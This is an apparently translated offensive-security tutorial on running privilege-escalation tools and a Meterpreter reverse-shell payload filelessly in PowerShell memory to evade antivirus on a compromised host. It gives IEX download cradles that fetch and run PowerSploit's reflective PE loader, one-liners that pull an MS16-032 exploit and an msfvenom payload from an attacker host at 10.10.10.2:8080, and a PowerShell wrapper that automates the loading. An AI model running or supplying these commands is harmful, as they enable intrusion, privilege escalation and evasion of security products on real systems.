0x00 Overview

Scenario: a privilege-escalation tool uploaded to the target is killed by AV as soon as it lands on disk. The workaround is to have PowerShell, launched from the webshell, load the EXE straight into its own memory so the binary never touches disk.

https://truesecdev.wordpress.com/2016/03/15/embedding-exe-files-into-powershell-scripts/

If you follow that post (the EXE is embedded in the script as a Base64 string and the script calls Invoke-ReflectivePEInjection itself), run the script file:

powershell -exec bypass -File Invoke-ReflectivePEInjection.ps1

or pull the loader straight from the clymb3r PowerSploit repository with a download cradle. The script is executed in memory and only defines the function; with -c it exists for that one command only, so the call to it has to follow in the same command string, as the later one-liners do:

powershell.exe -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1');"

Example call: Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR

With -PEUrl the loader fetches the EXE itself over HTTP from the attacker's host (here 10.10.10.2:8080), so the only thing that reaches the target is the one-liner; -ExeArgs is the argument string handed to the EXE (for the MS16-032 exploit binary below, the command it should run):

powershell.exe -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://10.10.10.2:8080/ms16-032_x64.exe -ExeArgs '"whoami"' -ForceASLR"

Note: the PE must match the bitness of the PowerShell process it is loaded into (Invoke-ReflectivePEInjection refuses a mismatch), and on a 64-bit host the default powershell.exe is 64-bit, so a 32-bit tool has to be rebuilt as 64-bit: set the VC++ platform to x64 and, if the project uses MFC, switch it to "Use MFC in a Static Library" so the image does not depend on MFC DLLs that the reflective loader would have to find on the target (anyone used to C++ will know these settings).

0x01 Msf-shell

1. Generate a plain Meterpreter payload, i.e. one that AV would normally catch on disk:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.10.2 lport=5555 -f exe > test.exe

2. Serve test.exe from the attacker's host and run the PowerShell one-liner on the remote host (the payload is x64, so it must run in 64-bit powershell.exe):

powershell.exe -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://10.10.10.2:8080/test.exe -ForceASLR"

3. Start a handler for the same payload, LHOST and LPORT on your own host beforehand; when the injected payload connects back, you get the session.
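The one-liners in 0x00 and 0x01 hand the EXE to the loader blind; the bitness and ASLR notes above are exactly what fails when they are wrong. The script below is an added example (not from the original post and not part of PowerSploit) that wraps the same flow for both sections: fetch the EXE over HTTP as with -PEUrl, or unpack it from an embedded Base64 string as in the truesec post, read its PE headers to confirm it matches the bitness of the current PowerShell process and is relocatable, decide whether -ForceASLR is needed, and only then call Invoke-ReflectivePEInjection. The attacker host 10.10.10.2:8080 and the clymb3r PowerSploit URL are the ones the post uses; the function names Get-PEInfo and Invoke-InMemoryExe are chosen here.

```powershell
# Added example: not from the original post and not part of PowerSploit.
# Assumptions: 10.10.10.2:8080 is the attacker host from the post, the clymb3r
# PowerSploit URL is the loader the post uses, and Get-PEInfo / Invoke-InMemoryExe
# are names chosen for this example.

function Get-PEInfo {
    # Reads the COFF and optional headers of a PE image held in memory.
    param([Parameter(Mandatory)][byte[]]$Bytes)
    if ($Bytes.Length -lt 0x40 -or $Bytes[0] -ne 0x4D -or $Bytes[1] -ne 0x5A) {
        throw 'Not a PE file: missing MZ header'
    }
    $pe = [BitConverter]::ToInt32($Bytes, 0x3C)                     # e_lfanew
    if ([BitConverter]::ToUInt32($Bytes, $pe) -ne 0x4550) {          # "PE\0\0"
        throw 'Not a PE file: missing PE signature'
    }
    $machine  = [BitConverter]::ToUInt16($Bytes, $pe + 4)           # IMAGE_FILE_HEADER.Machine
    $chars    = [BitConverter]::ToUInt16($Bytes, $pe + 22)          # IMAGE_FILE_HEADER.Characteristics
    $magic    = [BitConverter]::ToUInt16($Bytes, $pe + 24)          # optional header Magic
    $dllChars = [BitConverter]::ToUInt16($Bytes, $pe + 24 + 0x46)   # DllCharacteristics (offset 0x46 in PE32 and PE32+)
    [pscustomobject]@{
        Is64Bit     = ($machine -eq 0x8664) -and ($magic -eq 0x20B) # AMD64 machine + PE32+ magic
        IsDll       = ($chars -band 0x2000) -ne 0                   # IMAGE_FILE_DLL
        HasRelocs   = ($chars -band 0x0001) -eq 0                   # IMAGE_FILE_RELOCS_STRIPPED is clear
        DynamicBase = ($dllChars -band 0x0040) -ne 0                # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
    }
}

function Invoke-InMemoryExe {
    param(
        [string]$PEUrl,        # EXE served from the attacker host, as with -PEUrl in the post
        [string]$PEBase64,     # or the EXE embedded as a Base64 string, as in the truesec post
        [string]$ExeArgs = '',
        [string]$LoaderUrl = 'https://raw.githubusercontent.com/clymb3r/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1'
    )
    if (-not $PEUrl -and -not $PEBase64) { throw 'Supply -PEUrl or -PEBase64' }

    # raw.githubusercontent.com requires TLS 1.2; older .NET defaults to SSL3/TLS 1.0.
    # The enum member only exists from .NET 4.5 on, so tolerate its absence.
    try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 } catch { }
    $wc = New-Object Net.WebClient

    # Define Invoke-ReflectivePEInjection in this scope; nothing is written to disk.
    IEX ($wc.DownloadString($LoaderUrl))

    [byte[]]$PEBytes = if ($PEBase64) { [Convert]::FromBase64String($PEBase64) } else { $wc.DownloadData($PEUrl) }

    $info     = Get-PEInfo -Bytes $PEBytes
    $procIs64 = [IntPtr]::Size -eq 8
    if ($info.IsDll) { throw 'This wrapper handles EXEs only; a DLL needs -FuncReturnType instead' }
    if ($info.Is64Bit -ne $procIs64) {
        $want = if ($procIs64) { 'x64' } else { 'x86' }
        throw "PE bitness does not match this $want PowerShell process; rebuild the tool for $want or use the matching powershell.exe"
    }
    if (-not $info.HasRelocs) { throw 'Relocations stripped; the image cannot be rebased into this process' }

    $splat = @{ PEBytes = $PEBytes }
    if ($ExeArgs) { $splat['ExeArgs'] = $ExeArgs }
    # Built without /DYNAMICBASE but still relocatable: ask the loader to relocate it anyway.
    if (-not $info.DynamicBase) { $splat['ForceASLR'] = $true }
    Invoke-ReflectivePEInjection @splat
}

# Usage on the target (the handler from step 3 must already be listening):
#   Invoke-InMemoryExe -PEUrl 'http://10.10.10.2:8080/test.exe'
#   Invoke-InMemoryExe -PEUrl 'http://10.10.10.2:8080/ms16-032_x64.exe' -ExeArgs 'whoami'
```

Get-PEInfo needs no network and can be checked offline first, e.g. `Get-PEInfo -Bytes ([IO.File]::ReadAllBytes('C:\Windows\System32\notepad.exe'))` on a 64-bit host reports Is64Bit and DynamicBase as True; running it on the tool you intend to inject tells you before the attempt whether the x64 rebuild from the note in 0x00 is required and whether -ForceASLR will be added.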